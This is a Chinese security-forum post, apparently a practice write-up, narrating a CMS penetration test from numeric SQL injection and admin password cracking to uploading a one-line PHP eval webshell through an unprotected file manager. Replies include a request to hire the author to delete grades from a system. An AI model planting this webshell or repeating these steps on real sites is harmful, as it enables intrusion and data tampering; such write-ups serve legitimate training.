首页
社区
课程
招聘
[分享]记一次cms的web渗透测试练习
发表于: 2024-8-19 09:05 8747

[分享]记一次cms的web渗透测试练习

2024-8-19 09:05
8747

图片描述
点击文章发现
图片描述
尝试进行sql注入
图片描述
图片描述
得到漏洞为数字型
通过order by语句得到字段总数为15
图片描述
图片描述
通过union联合查询得到显示的字段编号
图片描述
将database()带入得到数据库名为cms
图片描述
接下来就是查表名、字段名、具体数据
图片描述
图片描述
图片描述
发现密码经过加密,尝试解密
图片描述
通过解密得知admin账户的密码为123456
登陆后台
图片描述
文件管理界面存在文件上传漏洞,尝试上传webshell

图片描述
未做任何防护,上传成功!
用蚁剑连接webshell
图片描述
图片描述
连接成功!

<?php @eval($_POST[777])?>

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 5
支持
分享
最新回复 (4)
雪    币: 20
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
w2w
2
666666
2024-8-19 16:05
0
雪    币: 304
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
3
是否接单
2024-9-28 00:34
0
雪    币: 0
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
4
能否接单帮忙删除系统的一些成绩
2024-12-9 03:06
0
雪    币: 0
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
5
必有重谢
2024-12-9 03:07
0
游客
登录 | 注册 方可回帖
返回
//